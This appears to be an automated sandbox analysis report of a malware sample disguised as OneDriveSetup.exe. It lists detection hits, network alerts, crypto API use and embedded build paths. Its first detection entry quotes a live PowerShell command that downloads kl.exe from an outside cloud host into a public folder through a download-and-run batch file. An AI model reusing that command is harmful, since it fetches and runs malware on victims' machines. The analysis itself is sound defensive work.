                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", ProcessId: 4496, ProcessName: powershell.exe
                Sigma detected: Suspicious Network Command
                Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: "cmd.exe" /C ipconfig /all, CommandLine: "cmd.exe" /C ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" , ParentImage: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe, ParentProcessId: 1304, ParentProcessName: LetsPRO.exe, ProcessCommandLine: "cmd.exe" /C ipconfig /all, ProcessId: 6360, ProcessName: cmd.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7768, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-04-13T17:48:30.672971+020020197142Potentially Bad Traffic192.168.2.44972243.132.105.214443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-04-13T17:48:20.166016+020028033043Unknown Traffic192.168.2.44971443.132.105.214443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: OneDriveSetup.exeVirustotal: Detection: 10%Perma Link
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleNeural Call Log Analysis: 99.1%
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006617EE CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,9_2_006617EE
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00667630 CryptAcquireContextW,CryptAcquireContextW,9_2_00667630
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00662045 CryptDecrypt,SetLastError,SetLastError,SetLastError,SetLastError,SetLastError,GetLastError,GetLastError,GetLastError,GetLastError,SetLastError,GetLastError,GetLastError,GetLastError,SetLastError,GetLastError,9_2_00662045
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00662045 CryptDecrypt,SetLastError,SetLastError,SetLastError,SetLastError,SetLastError,GetLastError,GetLastError,GetLastError,GetLastError,SetLastError,GetLastError,GetLastError,GetLastError,SetLastError,GetLastError,9_2_00662045
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00662045 CryptDecrypt,SetLastError,SetLastError,SetLastError,SetLastError,SetLastError,GetLastError,GetLastError,GetLastError,GetLastError,SetLastError,GetLastError,GetLastError,GetLastError,SetLastError,GetLastError,9_2_00662045
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006646F6 CryptContextAddRef,9_2_006646F6
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00665137 CryptGenRandom,9_2_00665137
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006610AA CryptStringToBinaryA,9_2_006610AA
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006628EC CryptStringToBinaryW,MultiByteToWideChar,MultiByteToWideChar,9_2_006628EC
                Source: OneDriveSetup.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                Compliance

                barindex
                Detected unpacking (creates a PE file in dynamic memory)
                Source: C:\Users\user\Desktop\OneDriveSetup.exeUnpacked PE file: 0.2.OneDriveSetup.exe.140000000.2.unpack
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeUnpacked PE file: 9.2.Agghosts.exe.10000000.2.unpack
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeUnpacked PE file: 24.2.Agghosts.exe.10000000.2.unpack
                Source: C:\Users\Public\Videos\bin.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.10 Nullsoft Install System v3.10License AgreementPlease review the license terms before installing letsvpn.Press Page Down to see the rest of the agreement.LetsVPN Terms of ServiceThese Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services).Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services.Intellectual Property RightsThe website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved.The Scope of Software LicensingA. Users can install use display and run the software on PC and mobile phones (same account support different devices).B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights.C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service.User InstructionsA. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc.B. LetsVPN Accounta. You understand that it is your responsibility to keep your LetsVPN account information confidentia
                Source: unknownHTTPS traffic detected: 43.132.105.214:443 -> 192.168.2.4:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 43.132.105.214:443 -> 192.168.2.4:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 4.152.45.219:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 4.152.45.219:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: OneDriveSetup.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: bin.exe, 00000017.00000003.1585292674.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: bin.exe, 00000017.00000003.1562615212.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1600056818.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: bin.exe, 00000017.00000003.1513635861.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: bin.exe, 00000017.00000003.1576354512.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: bin.exe, 00000017.00000003.1594016654.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: bin.exe, 00000017.00000003.1607566852.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001D.00000000.1811026709.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001D.00000002.1813119826.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000002.1855324120.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000000.1813487867.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.1856420036.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.1857742975.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1580441083.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: bin.exe, 00000017.00000003.1586870010.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: bin.exe, 00000017.00000003.1592925390.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: bin.exe, 00000017.00000003.1510230437.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: bin.exe, 00000017.00000003.1602872671.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: bin.exe, 00000017.00000003.1552758930.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: bin.exe, 00000017.00000003.1569651251.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: bin.exe, 00000017.00000003.1621744394.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdb source: bin.exe, 00000017.00000003.1624506293.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications.Messages\obj\Release\ToastNotifications.Messages.pdb source: bin.exe, 00000017.00000003.1644108290.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq\4.1.2.0\System.Linq.pdb source: bin.exe, 00000017.00000003.1590499522.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdb source: bin.exe, 00000017.00000003.1591734252.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdb source: bin.exe, 00000017.00000003.1622286946.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdb source: bin.exe, 00000017.00000003.1616704287.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdbSHA256 source: bin.exe, 00000017.00000003.1624506293.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Drawing.Primitives\4.0.2.0\System.Drawing.Primitives.pdb source: bin.exe, 00000017.00000003.1573517122.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: bin.exe, 00000017.00000003.1548626041.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: bin.exe, 00000017.00000003.1563813058.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: bin.exe, 00000017.00000003.1578661001.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: bin.exe, 00000017.00000003.1573124674.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: bin.exe, 00000017.00000003.1622286946.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: bin.exe, 00000017.00000003.1593483290.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WebView2Loader.dll.pdb source: bin.exe, 00000017.00000003.1678131607.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1678869626.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1663031979.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: bin.exe, 00000017.00000003.1603538546.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: bin.exe, 00000017.00000003.1645474810.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: bin.exe, 00000017.00000003.1577950171.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: bin.exe, 00000017.00000003.1626865159.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: bin.exe, 00000017.00000003.1545410871.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: bin.exe, 00000017.00000003.1504688065.0000000002735000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000022.00000003.1831133678.000002335EBD9000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000022.00000003.1829045886.000002335EB1C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: bin.exe, 00000017.00000003.1550365235.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: bin.exe, 00000017.00000003.1563142102.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: bin.exe, 00000017.00000003.1562615212.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: bin.exe, 00000017.00000003.1592199042.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: bin.exe, 00000017.00000003.1559734523.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: bin.exe, 00000017.00000003.1572181995.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: bin.exe, 00000017.00000003.1587357502.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: bin.exe, 00000017.00000003.1637794932.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: bin.exe, 00000017.00000003.1526409476.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: bin.exe, 00000017.00000003.1604218262.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: bin.exe, 00000017.00000003.1565142472.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.IdentityModel.pdb source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: bin.exe, 00000017.00000003.1596763609.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: bin.exe, 00000017.00000003.1625012758.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WebView2Loader.dll.pdb}> source: bin.exe, 00000017.00000003.1678869626.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: bin.exe, 00000017.00000003.1610160975.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\build\xra_common\webview_3497\Release_tjfuyun\webview.pdb. source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: Z:\Zemana\Projects\AMSDKCore\Driver\zam64.pdb source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: bin.exe, 00000017.00000003.1577151692.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: bin.exe, 00000017.00000003.1538662280.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: bin.exe, 00000017.00000003.1543633291.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdb source: bin.exe, 00000017.00000003.1643180881.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdbSHA256 source: bin.exe, 00000017.00000003.1630497195.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Z:\Zemana\Projects\AntiMalware\bin\zam64.pdb source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb,)F) 8)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1606248215.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.TypeConverter\4.1.2.0\System.ComponentModel.TypeConverter.pdb source: bin.exe, 00000017.00000003.1561174473.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdb source: bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Extensions\4.0.1.0\System.Reflection.Extensions.pdb source: bin.exe, 00000017.00000003.1600632610.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb source: bin.exe, 00000017.00000003.1551600625.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb source: bin.exe, 00000017.00000003.1645474810.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Concurrent\4.0.11.0\System.Collections.Concurrent.pdb source: bin.exe, 00000017.00000003.1553314105.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NetworkInformation\4.1.2.0\System.Net.NetworkInformation.pdb source: bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Mono.Cecil.Pdb source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ZMono.Cecil.Pdb, PublicKey=00240000048000009400000006020000002400005253413100040000010001002b5c9f7f04346c324a3176f8d3ee823bbf2d60efdbc35f86fd9e65ea3e6cd11bcdcba3a353e55133c8ac5c4caaba581b2c6dfff2cc2d0edc43959ddb86b973300a479a82419ef489c3225f1fe429a708507bd515835160e10bc743d20ca33ab9570cfd68d479fcf0bc797a763bec5d1000f0159ef619e709d915975e87beebaf source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdb source: bin.exe, 00000017.00000003.1600056818.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Globalization.Extensions/netfx\System.Globalization.Extensions.pdb source: bin.exe, 00000017.00000003.1575333150.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: bin.exe, 00000017.00000003.1676611150.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb source: bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: bin.exe, 00000017.00000003.1529710100.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: bin.exe, 00000017.00000003.1646188460.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: bin.exe, 00000017.00000003.1633109053.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Formatters\4.0.2.0\System.Runtime.Serialization.Formatters.pdb source: bin.exe, 00000017.00000003.1611174675.0000000002730000.00000004.00000020.00020000.00000000.sdmp
